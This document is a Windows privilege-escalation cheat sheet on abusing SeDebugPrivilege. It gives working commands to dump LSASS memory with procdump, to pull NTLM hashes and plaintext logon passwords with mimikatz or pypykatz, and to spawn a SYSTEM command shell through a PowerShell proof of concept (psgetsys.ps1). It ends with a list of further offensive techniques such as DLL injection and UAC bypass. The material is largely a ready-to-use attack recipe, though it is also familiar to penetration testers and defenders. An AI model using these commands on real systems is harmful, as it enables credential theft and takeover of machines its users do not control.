sedebugprivilege

Check seDebugPrivilege privilege

whoami /priv

Dumping LSASS process credentials

Procdump (procdump)

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Extract hashes

pypykatz lsa minidump lsass.dmp

OR

Extract NTLM hash

mimikatz.exe 
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Remote Code Execution using "SeDebugPrivilege"

Download POC script

Exploit

tasklist

.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<win_logon_pid>,"c:\windows\system32\cmd.exe","")

OR

.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process "lsass").Id,"c:\windows\system32\cmd.exe","")

1. Verify SeDebugPrivilege:

• whoami /priv 2. Dump LSASS:

• procdump.exe -accepteula -ma lsass.exe lsass.dmp

• (Task Manager: Right-click lsass.exe -> Create dump file) 3. Extract Credentials:

• mimikatz.exe

• sekurlsa::minidump lsass.dmp

• sekurlsa::logonpasswords 4. RCE as SYSTEM:

• [MyProcess]::CreateProcessFromParent(<PID>,"cmd.exe","") (PowerShell)

• (Alternative tools: depends on the tool)

Tools:

• pypykatz: For LSASS dump analysis on non-Windows systems.

• Process Explorer (Sysinternals): For detailed process information.

• WinDbg: For advanced process debugging and memory analysis.

Techniques:

• DLL Injection: Injecting malicious code into privileged processes.

• Handle Duplication: Gaining access to privileged process resources.

• Exploiting Vulnerable Drivers: Leveraging SeDebugPrivilege to exploit kernel vulnerabilities.

• Bypassing User Account Control (UAC): Using UAC bypasses to get the initial elevated prompt, that is required by SeDebug.